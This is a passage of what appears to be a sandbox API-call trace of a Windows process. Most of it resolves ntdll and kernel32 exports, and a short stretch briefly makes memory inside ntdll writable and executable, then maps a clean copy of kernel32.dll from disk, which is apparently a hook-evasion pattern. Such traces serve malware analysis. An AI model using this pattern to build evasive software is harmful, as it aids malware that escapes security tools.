lpProcName="NtAllocateLocallyUniqueId") returned 0x77c60310 [0055.144] GetProcAddress (hModule=0x77c40000, lpProcName="NtAllocateReserveObject") returned 0x77c6032c [0055.145] GetProcAddress (hModule=0x77c40000, lpProcName="NtAllocateUserPhysicalPages") returned 0x77c60344 [0055.145] GetProcAddress (hModule=0x77c40000, lpProcName="NtAllocateUuids") returned 0x77c6035c [0055.146] GetProcAddress (hModule=0x77c40000, lpProcName="NtAllocateVirtualMemory") returned 0x77c5fab0 [0055.146] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcAcceptConnectPort") returned 0x77c60378 [0055.146] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcCancelMessage") returned 0x77c60390 [0055.146] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcConnectPort") returned 0x77c603a8 [0055.147] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcCreatePort") returned 0x77c603c0 [0055.147] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcCreatePortSection") returned 0x77c603d8 [0055.147] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcCreateResourceReserve") returned 0x77c603f0 [0055.147] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcCreateSectionView") returned 0x77c60408 [0055.147] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcCreateSecurityContext") returned 0x77c60420 [0055.147] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcDeletePortSection") returned 0x77c60438 [0055.147] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcDeleteResourceReserve") returned 0x77c60450 [0055.148] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcDeleteSectionView") returned 0x77c60468 [0055.148] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcDeleteSecurityContext") returned 0x77c60480 [0055.148] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcDisconnectPort") returned 0x77c60498 [0055.148] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcImpersonateClientOfPort") returned 0x77c604b0 [0055.148] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcOpenSenderProcess") returned 0x77c604c8 [0055.148] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcOpenSenderThread") returned 0x77c604e0 [0055.149] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcQueryInformation") returned 0x77c604f8 [0055.149] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcQueryInformationMessage") returned 0x77c60510 [0055.149] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcRevokeSecurityContext") returned 0x77c60528 [0055.149] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcSendWaitReceivePort") returned 0x77c60540 [0055.149] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlpcSetInformation") returned 0x77c60558 [0055.149] GetProcAddress (hModule=0x77c40000, lpProcName="NtApphelpCacheControl") returned 0x77c5ffc4 [0055.149] GetProcAddress (hModule=0x77c40000, lpProcName="NtAreMappedFilesTheSame") returned 0x77c60570 [0055.150] GetProcAddress (hModule=0x77c40000, lpProcName="NtAssignProcessToJobObject") returned 0x77c6058c [0055.150] GetProcAddress (hModule=0x77c40000, lpProcName="NtCallbackReturn") returned 0x77c5f8c8 [0055.150] GetProcAddress (hModule=0x77c40000, lpProcName="NtCancelIoFile") returned 0x77c6016c [0055.150] GetProcAddress (hModule=0x77c40000, lpProcName="NtCancelIoFileEx") returned 0x77c605a8 [0055.150] GetProcAddress (hModule=0x77c40000, lpProcName="NtCancelSynchronousIoFile") returned 0x77c605c0 [0055.150] GetProcAddress (hModule=0x77c40000, lpProcName="NtCancelTimer") returned 0x77c601cc [0055.151] GetProcAddress (hModule=0x77c40000, lpProcName="NtClearEvent") returned 0x77c5fe64 [0055.151] GetProcAddress (hModule=0x77c40000, lpProcName="NtClose") returned 0x77c5f9d0 [0055.151] GetProcAddress (hModule=0x77c40000, lpProcName="NtCloseObjectAuditAlarm") returned 0x77c5fe1c [0055.151] GetProcAddress (hModule=0x77c40000, lpProcName="NtCommitComplete") returned 0x77c605d8 [0055.151] GetProcAddress (hModule=0x77c40000, lpProcName="NtCommitEnlistment") returned 0x77c605f0 [0055.151] GetProcAddress (hModule=0x77c40000, lpProcName="NtCommitTransaction") returned 0x77c60608 [0055.151] GetProcAddress (hModule=0x77c40000, lpProcName="NtCompactKeys") returned 0x77c60620 [0055.152] GetProcAddress (hModule=0x77c40000, lpProcName="NtCompareTokens") returned 0x77c60638 [0055.152] GetProcAddress (hModule=0x77c40000, lpProcName="NtCompleteConnectPort") returned 0x77c60650 [0055.152] GetProcAddress (hModule=0x77c40000, lpProcName="NtCompressKey") returned 0x77c60668 [0055.152] GetProcAddress (hModule=0x77c40000, lpProcName="NtConnectPort") returned 0x77c60684 [0055.152] GetProcAddress (hModule=0x77c40000, lpProcName="NtContinue") returned 0x77c5fee0 [0055.152] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateDebugObject") returned 0x77c6069c [0055.153] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateDirectoryObject") returned 0x77c606b4 [0055.153] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateEnlistment") returned 0x77c606cc [0055.153] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateEvent") returned 0x77c5ff64 [0055.153] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateEventPair") returned 0x77c606e4 [0055.153] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateFile") returned 0x77c600a4 [0055.153] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateIoCompletion") returned 0x77c606fc [0055.153] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateJobObject") returned 0x77c60714 [0055.154] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateJobSet") returned 0x77c6072c [0055.154] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateKey") returned 0x77c5fb30 [0055.154] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateKeyTransacted") returned 0x77c60744 [0055.154] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateKeyedEvent") returned 0x77c6075c [0055.154] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateMailslotFile") returned 0x77c60774 [0055.154] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateMutant") returned 0x77c6078c [0055.155] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateNamedPipeFile") returned 0x77c607a4 [0055.155] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreatePagingFile") returned 0x77c607bc [0055.155] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreatePort") returned 0x77c607d4 [0055.155] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreatePrivateNamespace") returned 0x77c607ec [0055.155] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateProcess") returned 0x77c60804 [0055.155] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateProcessEx") returned 0x77c5ffdc [0055.156] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateProfile") returned 0x77c6081c [0055.156] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateProfileEx") returned 0x77c60834 [0055.156] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateResourceManager") returned 0x77c6084c [0055.156] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateSection") returned 0x77c5ff94 [0055.156] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateSemaphore") returned 0x77c60864 [0055.156] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateSymbolicLinkObject") returned 0x77c6087c [0055.157] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateThread") returned 0x77c5fff4 [0055.157] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateThreadEx") returned 0x77c60894 [0055.157] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateTimer") returned 0x77c608ac [0055.157] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateToken") returned 0x77c608c4 [0055.157] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateTransaction") returned 0x77c608dc [0055.157] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateTransactionManager") returned 0x77c608f4 [0055.157] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateUserProcess") returned 0x77c6090c [0055.158] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateWaitablePort") returned 0x77c60924 [0055.158] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateWorkerFactory") returned 0x77c6093c [0055.158] GetProcAddress (hModule=0x77c40000, lpProcName="NtCurrentTeb") returned 0x77cdef53 [0055.158] GetProcAddress (hModule=0x77c40000, lpProcName="NtDebugActiveProcess") returned 0x77c60954 [0055.158] GetProcAddress (hModule=0x77c40000, lpProcName="NtDebugContinue") returned 0x77c60970 [0055.158] GetProcAddress (hModule=0x77c40000, lpProcName="NtDelayExecution") returned 0x77c5fd6c [0055.159] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteAtom") returned 0x77c60988 [0055.159] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteBootEntry") returned 0x77c609a4 [0055.159] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteDriverEntry") returned 0x77c609bc [0055.159] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteFile") returned 0x77c609d4 [0055.159] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteKey") returned 0x77c609ec [0055.159] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteObjectAuditAlarm") returned 0x77c60a04 [0055.159] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeletePrivateNamespace") returned 0x77c60a1c [0055.160] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteValueKey") returned 0x77c60a34 [0055.160] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeviceIoControlFile") returned 0x77c5f8fc [0055.160] GetProcAddress (hModule=0x77c40000, lpProcName="NtDisableLastKnownGood") returned 0x77c60a4c [0055.160] GetProcAddress (hModule=0x77c40000, lpProcName="NtDisplayString") returned 0x77c60a64 [0055.160] GetProcAddress (hModule=0x77c40000, lpProcName="NtDrawText") returned 0x77c60a7c [0055.160] GetProcAddress (hModule=0x77c40000, lpProcName="NtDuplicateObject") returned 0x77c5fe34 [0055.161] GetProcAddress (hModule=0x77c40000, lpProcName="NtDuplicateToken") returned 0x77c5fec8 [0055.161] GetProcAddress (hModule=0x77c40000, lpProcName="NtEnableLastKnownGood") returned 0x77c60a94 [0055.161] GetProcAddress (hModule=0x77c40000, lpProcName="NtEnumerateBootEntries") returned 0x77c60aac [0055.161] GetProcAddress (hModule=0x77c40000, lpProcName="NtEnumerateDriverEntries") returned 0x77c60ac4 [0055.161] GetProcAddress (hModule=0x77c40000, lpProcName="NtEnumerateKey") returned 0x77c5fd3c [0055.161] GetProcAddress (hModule=0x77c40000, lpProcName="NtEnumerateSystemEnvironmentValuesEx") returned 0x77c60adc [0055.161] GetProcAddress (hModule=0x77c40000, lpProcName="NtEnumerateTransactionObject") returned 0x77c60af4 [0055.162] GetProcAddress (hModule=0x77c40000, lpProcName="NtEnumerateValueKey") returned 0x77c5fa30 [0055.162] GetProcAddress (hModule=0x77c40000, lpProcName="NtExtendSection") returned 0x77c60b0c [0055.162] GetProcAddress (hModule=0x77c40000, lpProcName="NtFilterToken") returned 0x77c60b24 [0055.162] GetProcAddress (hModule=0x77c40000, lpProcName="NtFindAtom") returned 0x77c5fa48 [0055.162] GetProcAddress (hModule=0x77c40000, lpProcName="NtFlushBuffersFile") returned 0x77c5ffac [0055.162] GetProcAddress (hModule=0x77c40000, lpProcName="NtFlushInstallUILanguage") returned 0x77c60b3c [0055.163] GetProcAddress (hModule=0x77c40000, lpProcName="NtFlushInstructionCache") returned 0x77c60b54 [0055.163] GetProcAddress (hModule=0x77c40000, lpProcName="NtFlushKey") returned 0x77c60b70 [0055.163] GetProcAddress (hModule=0x77c40000, lpProcName="NtFlushProcessWriteBuffers") returned 0x77c60b8c [0055.163] GetProcAddress (hModule=0x77c40000, lpProcName="NtFlushVirtualMemory") returned 0x77c60ba4 [0055.163] GetProcAddress (hModule=0x77c40000, lpProcName="NtFlushWriteBuffer") returned 0x77c60bbc [0055.163] GetProcAddress (hModule=0x77c40000, lpProcName="NtFreeUserPhysicalPages") returned 0x77c60bd8 [0055.163] GetProcAddress (hModule=0x77c40000, lpProcName="NtFreeVirtualMemory") returned 0x77c5fb48 [0055.164] GetProcAddress (hModule=0x77c40000, lpProcName="NtFreezeRegistry") returned 0x77c60bf0 [0055.164] GetProcAddress (hModule=0x77c40000, lpProcName="NtFreezeTransactions") returned 0x77c60c08 [0055.164] GetProcAddress (hModule=0x77c40000, lpProcName="NtFsControlFile") returned 0x77c5fde8 [0055.164] GetProcAddress (hModule=0x77c40000, lpProcName="NtGetContextThread") returned 0x77c60c20 [0055.164] GetProcAddress (hModule=0x77c40000, lpProcName="NtGetCurrentProcessorNumber") returned 0x77c60c38 [0055.164] GetProcAddress (hModule=0x77c40000, lpProcName="NtGetDevicePowerState") returned 0x77c60c54 [0055.165] GetProcAddress (hModule=0x77c40000, lpProcName="NtGetMUIRegistryInfo") returned 0x77c60c70 [0055.165] GetProcAddress (hModule=0x77c40000, lpProcName="NtGetNextProcess") returned 0x77c60c88 [0055.165] GetProcAddress (hModule=0x77c40000, lpProcName="NtGetNextThread") returned 0x77c60ca0 [0055.165] GetProcAddress (hModule=0x77c40000, lpProcName="NtGetNlsSectionPtr") returned 0x77c60cb8 [0055.165] GetProcAddress (hModule=0x77c40000, lpProcName="NtGetNotificationResourceManager") returned 0x77c60cd0 [0055.165] GetProcAddress (hModule=0x77c40000, lpProcName="NtGetPlugPlayEvent") returned 0x77c60ce8 [0055.165] GetProcAddress (hModule=0x77c40000, lpProcName="NtGetTickCount") returned 0x77cf11dc [0055.166] GetProcAddress (hModule=0x77c40000, lpProcName="NtGetWriteWatch") returned 0x77c60d00 [0055.166] GetProcAddress (hModule=0x77c40000, lpProcName="NtImpersonateAnonymousToken") returned 0x77c60d18 [0055.166] GetProcAddress (hModule=0x77c40000, lpProcName="NtImpersonateClientOfPort") returned 0x77c5fb60 [0055.166] GetProcAddress (hModule=0x77c40000, lpProcName="NtImpersonateThread") returned 0x77c60d34 [0055.166] GetProcAddress (hModule=0x77c40000, lpProcName="NtInitializeNlsFiles") returned 0x77c60d4c [0055.166] GetProcAddress (hModule=0x77c40000, lpProcName="NtInitializeRegistry") returned 0x77c60d64 [0055.167] GetProcAddress (hModule=0x77c40000, lpProcName="NtInitiatePowerAction") returned 0x77c60d7c [0055.167] GetProcAddress (hModule=0x77c40000, lpProcName="NtIsProcessInJob") returned 0x77c6000c [0055.167] GetProcAddress (hModule=0x77c40000, lpProcName="NtIsSystemResumeAutomatic") returned 0x77c60d98 [0055.167] GetProcAddress (hModule=0x77c40000, lpProcName="NtIsUILanguageComitted") returned 0x77c60db4 [0055.167] GetProcAddress (hModule=0x77c40000, lpProcName="NtListenPort") returned 0x77c60dcc [0055.167] GetProcAddress (hModule=0x77c40000, lpProcName="NtLoadDriver") returned 0x77c60de4 [0055.167] GetProcAddress (hModule=0x77c40000, lpProcName="NtLoadKey") returned 0x77c60dfc [0055.168] GetProcAddress (hModule=0x77c40000, lpProcName="NtLoadKey2") returned 0x77c60e14 [0055.168] GetProcAddress (hModule=0x77c40000, lpProcName="NtLoadKeyEx") returned 0x77c60e2c [0055.168] GetProcAddress (hModule=0x77c40000, lpProcName="NtLockFile") returned 0x77c60e44 [0055.168] GetProcAddress (hModule=0x77c40000, lpProcName="NtLockProductActivationKeys") returned 0x77c60e5c [0055.168] GetProcAddress (hModule=0x77c40000, lpProcName="NtLockRegistryKey") returned 0x77c60e78 [0055.168] GetProcAddress (hModule=0x77c40000, lpProcName="NtLockVirtualMemory") returned 0x77c60e94 [0055.169] GetProcAddress (hModule=0x77c40000, lpProcName="NtMakePermanentObject") returned 0x77c60eac [0055.169] GetProcAddress (hModule=0x77c40000, lpProcName="NtMakeTemporaryObject") returned 0x77c60ec8 [0055.169] GetProcAddress (hModule=0x77c40000, lpProcName="NtMapCMFModule") returned 0x77c60ee4 [0055.169] GetProcAddress (hModule=0x77c40000, lpProcName="NtMapUserPhysicalPages") returned 0x77c60efc [0055.169] GetProcAddress (hModule=0x77c40000, lpProcName="NtMapUserPhysicalPagesScatter") returned 0x77c5f890 [0055.169] GetProcAddress (hModule=0x77c40000, lpProcName="NtMapViewOfSection") returned 0x77c5fc40 [0055.169] GetProcAddress (hModule=0x77c40000, lpProcName="NtModifyBootEntry") returned 0x77c60f18 [0055.170] GetProcAddress (hModule=0x77c40000, lpProcName="NtModifyDriverEntry") returned 0x77c60f30 [0055.170] GetProcAddress (hModule=0x77c40000, lpProcName="NtNotifyChangeDirectoryFile") returned 0x77c60f48 [0055.170] GetProcAddress (hModule=0x77c40000, lpProcName="NtNotifyChangeKey") returned 0x77c60f60 [0055.170] GetProcAddress (hModule=0x77c40000, lpProcName="NtNotifyChangeMultipleKeys") returned 0x77c60f78 [0055.170] GetProcAddress (hModule=0x77c40000, lpProcName="NtNotifyChangeSession") returned 0x77c60f90 [0055.170] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenDirectoryObject") returned 0x77c600ec [0055.171] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenEnlistment") returned 0x77c60fa8 [0055.171] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenEvent") returned 0x77c5fe98 [0055.171] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenEventPair") returned 0x77c60fc0 [0055.171] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0055.171] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenIoCompletion") returned 0x77c60fd8 [0055.171] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenJobObject") returned 0x77c60ff0 [0055.171] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenKey") returned 0x77c5fa18 [0055.172] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenKeyEx") returned 0x77c61008 [0055.172] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenKeyTransacted") returned 0x77c61020 [0055.172] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenKeyTransactedEx") returned 0x77c61038 [0055.172] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenKeyedEvent") returned 0x77c61050 [0055.172] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenMutant") returned 0x77c61068 [0055.172] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenObjectAuditAlarm") returned 0x77c61080 [0055.172] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenPrivateNamespace") returned 0x77c61098 [0055.173] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenProcess") returned 0x77c5fc10 [0055.173] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenProcessToken") returned 0x77c610b0 [0055.173] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenProcessTokenEx") returned 0x77c5fd08 [0055.173] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenResourceManager") returned 0x77c610c8 [0055.173] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenSection") returned 0x77c5fdb8 [0055.173] VirtualProtect (in: lpAddress=0x77c60028, dwSize=0x40, flNewProtect=0x40, lpflOldProtect=0x18efd4 | out: lpflOldProtect=0x18efd4*=0x20) returned 1 [0055.174] GetCurrentProcess () returned 0xffffffff [0055.174] VirtualProtect (in: lpAddress=0x77c60028, dwSize=0x40, flNewProtect=0x20, lpflOldProtect=0x18efd0 | out: lpflOldProtect=0x18efd0*=0x40) returned 1 [0055.215] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0055.215] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0055.215] GetModuleFileNameW (in: hModule=0x76d30000, lpFilename=0x18efd8, nSize=0x104 | out: lpFilename="C:\\Windows\\syswow64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0055.215] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0055.215] CreateFileW (lpFileName="C:\\Windows\\syswow64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x144 [0055.216] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0055.216] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0055.216] GetFileSize (in: hFile=0x144, lpFileSizeHigh=0x18efcc | out: lpFileSizeHigh=0x18efcc*=0x0) returned 0xcc800 [0055.216] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0055.216] CreateFileMappingW (hFile=0x144, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x148 [0055.216] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0055.216] MapViewOfFile (hFileMappingObject=0x148, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcc800) returned 0x3210000 [0055.219] GetProcAddress (hModule=0x76d30000, lpProcName="ActivateActCtx") returned 0x76d45490 [0055.220] GetProcAddress (hModule=0x76d30000, lpProcName="AddAtomA") returned 0x76d5ed6e [0055.220] GetProcAddress (hModule=0x76d30000, lpProcName="AddAtomW") returned 0x76d5cdfc [0055.221] GetProcAddress (hModule=0x76d30000, lpProcName="AddConsoleAliasA") returned 0x76de653e [0055.221] GetProcAddress (hModule=0x76d30000, lpProcName="AddConsoleAliasW") returned 0x76de64d4 [0055.222] GetProcAddress (hModule=0x76d30000, lpProcName="AddIntegrityLabelToBoundaryDescriptor") returned 0x76dc48c2 [0055.222] GetProcAddress (hModule=0x76d30000, lpProcName="AddLocalAlternateComputerNameA") returned 0x76db7090 [0055.222] GetProcAddress (hModule=0x76d30000, lpProcName="AddLocalAlternateComputerNameW") returned 0x76db6fa5 [0055.223] GetProcAddress (hModule=0x76d30000, lpProcName="AddRefActCtx") returned 0x76d5d540 [0055.223] GetProcAddress (hModule=0x76d30000, lpProcName="AddSIDToBoundaryDescriptor") returned 0x76d6918b [0055.224] GetProcAddress (hModule=0x76d30000, lpProcName="AddSecureMemoryCacheCallback") returned 0x76dbf030 [0055.225] GetProcAddress (hModule=0x76d30000, lpProcName="AdjustCalendarDate") returned 0x76dd4e3a [0055.226] GetProcAddress (hModule=0x76d30000, lpProcName="AllocConsole") returned 0x76de6b26 [0055.227] GetProcAddress (hModule=0x76d30000, lpProcName="AllocateUserPhysicalPages") returned 0x76dce3ec [0055.227] GetProcAddress (hModule=0x76d30000, lpProcName="AllocateUserPhysicalPagesNuma") returned 0x76dce41a [0055.228] GetProcAddress (hModule=0x76d30000, lpProcName="ApplicationRecoveryFinished") returned 0x76dce016 [0055.228] GetProcAddress (hModule=0x76d30000, lpProcName="ApplicationRecoveryInProgress") returned 0x76dce026 [0055.228] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0055.228] GetProcAddress (hModule=0x76d30000, lpProcName="AssignProcessToJobObject") returned 0x76d6c862 [0055.228] GetProcAddress (hModule=0x76d30000, lpProcName="AttachConsole") returned 0x76de6bea [0055.229] GetProcAddress (hModule=0x76d30000, lpProcName="BackupRead") returned 0x76db4996 [0055.229] GetProcAddress (hModule=0x76d30000, lpProcName="BackupSeek") returned 0x76db391e [0055.229] GetProcAddress (hModule=0x76d30000, lpProcName="BackupWrite") returned 0x76db5050 [0055.229] GetProcAddress (hModule=0x76d30000, lpProcName="BaseCheckAppcompatCache") returned 0x76dcdce5 [0055.231] GetProcAddress (hModule=0x76d30000, lpProcName="BaseCheckAppcompatCacheEx") returned 0x76d52266 [0055.231] GetProcAddress (hModule=0x76d30000, lpProcName="BaseCheckRunApp") returned 0x76d59dbb [0055.231] GetProcAddress (hModule=0x76d30000, lpProcName="BaseCleanupAppcompatCacheSupport") returned 0x76dcdc8f [0055.232] GetProcAddress (hModule=0x76d30000, lpProcName="BaseDllReadWriteIniFile") returned 0x76d4e541 [0055.232] GetProcAddress (hModule=0x76d30000, lpProcName="BaseFlushAppcompatCache") returned 0x76dcdcc2 [0055.232] GetProcAddress (hModule=0x76d30000, lpProcName="BaseFormatObjectAttributes") returned 0x76d51278 [0055.232] GetProcAddress (hModule=0x76d30000, lpProcName="BaseFormatTimeOut") returned 0x76d5f98a [0055.232] GetProcAddress (hModule=0x76d30000, lpProcName="BaseGenerateAppCompatData") returned 0x76d53757 [0055.233] GetProcAddress (hModule=0x76d30000, lpProcName="BaseGetNamedObjectDirectory") returned 0x76de4c60 [0055.233] GetProcAddress (hModule=0x76d30000, lpProcName="BaseInitAppcompatCacheSupport") returned 0x76dcde99 [0055.233] GetProcAddress (hModule=0x76d30000, lpProcName="BaseIsAppcompatInfrastructureDisabled") returned 0x76d50e03 [0055.233] GetProcAddress (hModule=0x76d30000, lpProcName="BaseQueryModuleData") returned 0x76d656ba [0055.234] GetProcAddress (hModule=0x76d30000, lpProcName="BaseSetLastNTError") returned 0x76d41668 [0055.234] GetProcAddress (hModule=0x76d30000, lpProcName="BaseThreadInitThunk") returned 0x76d433b8 [0055.234] GetProcAddress (hModule=0x76d30000, lpProcName="BaseUpdateAppcompatCache") returned 0x76d656a0 [0055.234] GetProcAddress (hModule=0x76d30000, lpProcName="BaseVerifyUnicodeString") returned 0x76de4bfc [0055.234] GetProcAddress (hModule=0x76d30000, lpProcName="Basep8BitStringToDynamicUnicodeString") returned 0x76d4496a [0055.234] GetProcAddress (hModule=0x76d30000, lpProcName="BasepAllocateActivationContextActivationBlock") returned 0x76de4ded [0055.234] GetProcAddress (hModule=0x76d30000, lpProcName="BasepAnsiStringToDynamicUnicodeString") returned 0x76de4a11 [0055.235] GetProcAddress (hModule=0x76d30000, lpProcName="BasepCheckAppCompat") returned 0x76dbaa52 [0055.235] GetProcAddress (hModule=0x76d30000, lpProcName="BasepCheckBadapp") returned 0x76d52f59 [0055.235] GetProcAddress (hModule=0x76d30000, lpProcName="BasepCheckWinSaferRestrictions") returned 0x76d55309 [0055.235] GetProcAddress (hModule=0x76d30000, lpProcName="BasepFreeActivationContextActivationBlock") returned 0x76de4f63 [0055.235] GetProcAddress (hModule=0x76d30000, lpProcName="BasepFreeAppCompatData") returned 0x76d54d31 [0055.235] GetProcAddress (hModule=0x76d30000, lpProcName="BasepMapModuleHandle") returned 0x76d5e856 [0055.235] GetProcAddress (hModule=0x76d30000, lpProcName="Beep") returned 0x76db52e8 [0055.235] GetProcAddress (hModule=0x76d30000, lpProcName="BeginUpdateResourceA") returned 0x76dd3f39 [0055.236] GetProcAddress (hModule=0x76d30000, lpProcName="BeginUpdateResourceW") returned 0x76dd3d6c [0055.236] GetProcAddress (hModule=0x76d30000, lpProcName="BindIoCompletionCallback") returned 0x76d5d8fe [0055.236] GetProcAddress (hModule=0x76d30000, lpProcName="BuildCommDCBA") returned 0x76dcd036 [0055.236] GetProcAddress (hModule=0x76d30000, lpProcName="BuildCommDCBAndTimeoutsA") returned 0x76dcd007 [0055.236] GetProcAddress (hModule=0x76d30000, lpProcName="BuildCommDCBAndTimeoutsW") returned 0x76dcd069 [0055.236] GetProcAddress (hModule=0x76d30000, lpProcName="BuildCommDCBW") returned 0x76dcd0c3 [0055.237] GetProcAddress (hModule=0x76d30000, lpProcName="CallNamedPipeA") returned 0x76dc1f74 [0055.237] GetProcAddress (hModule=0x76d30000, lpProcName="CallNamedPipeW") returned 0x76dc1b28 [0055.237] GetProcAddress (hModule=0x76d30000, lpProcName="CallbackMayRunLong") returned 0x76d5cf87 [0055.237] GetProcAddress (hModule=0x76d30000, lpProcName="CancelDeviceWakeupRequest") returned 0x76dc2b40 [0055.237] GetProcAddress (hModule=0x76d30000, lpProcName="CancelIo") returned 0x76dbbce9 [0055.237] GetProcAddress (hModule=0x76d30000, lpProcName="CancelIoEx") returned 0x76d5efbc [0055.238] GetProcAddress (hModule=0x76d30000, lpProcName="CancelSynchronousIo") returned 0x76dbbcb9 [0055.238] GetProcAddress (hModule=0x76d30000, lpProcName="CancelTimerQueueTimer") returned 0x76dce748 [0055.238] GetProcAddress (hModule=0x76d30000, lpProcName="CancelWaitableTimer") returned 0x76dc40db [0055.238] GetProcAddress (hModule=0x76d30000, lpProcName="ChangeTimerQueueTimer") returned 0x76dc40eb [0055.238] GetProcAddress (hModule=0x76d30000, lpProcName="CheckElevation") returned 0x76dbade5 [0055.238] GetProcAddress (hModule=0x76d30000, lpProcName="CheckElevationEnabled") returned 0x76d5315e [0055.239] GetProcAddress (hModule=0x76d30000, lpProcName="CheckForReadOnlyResource") returned 0x76d67946 [0055.239] GetProcAddress (hModule=0x76d30000, lpProcName="CheckNameLegalDOS8Dot3A") returned 0x76dc28d1 [0055.239] GetProcAddress (hModule=0x76d30000, lpProcName="CheckNameLegalDOS8Dot3W") returned 0x76dc2473 [0055.239] GetProcAddress (hModule=0x76d30000, lpProcName="CheckRemoteDebuggerPresent") returned 0x76d6b0fe [0055.239] GetProcAddress (hModule=0x76d30000, lpProcName="ClearCommBreak") returned 0x76dc80a9 [0055.254] GetProcAddress (hModule=0x76d30000, lpProcName="ClearCommError") returned 0x76dc68bf [0055.255] GetProcAddress (hModule=0x76d30000, 